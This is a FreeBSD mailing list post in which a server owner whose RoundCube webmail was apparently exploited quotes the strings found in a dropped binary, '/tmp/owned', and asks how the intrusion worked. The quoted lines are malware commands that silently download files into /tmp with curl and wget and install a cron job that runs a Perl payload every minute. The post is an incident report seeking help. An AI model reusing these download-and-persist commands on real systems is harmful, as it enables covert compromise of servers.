Colin Brace wrote:
> ahhhhh, another directory found in /tmp with files written by www called
> .bash/ Contents here:
Apropos of the contents of the above, a correspondent writes: 

running 'strings' on /tmp/owned will show 
cd /tmp;curl -s -O 2>&1 >/dev/null
cd /tmp;wget -b 2>&1 >/dev/null
echo '*/1 * * * * perl /tmp/tmpfile' >cron.job
crontab cron.job
rm -rf cron.job
chmod 0100 /tmp/tmpfile 2>&1 >/dev/null
perl /tmp/tmpfile 2>&1 >/dev/null"

So this would be the original mischief-maker.

Just out of curiousity, can someone explain to me in basic terms how an
intruder exploits a vulnerability such as apparently existed on my system
(the RoundCube webmail package was apparently the culprit) to place the
binary file "owned" in /tmp and execute it?


  Colin Brace
View this message in context:
Sent from the freebsd-questions mailing list archive at

_______________________________________________ mailing list
To unsubscribe, send any mail to ""

Reply via email to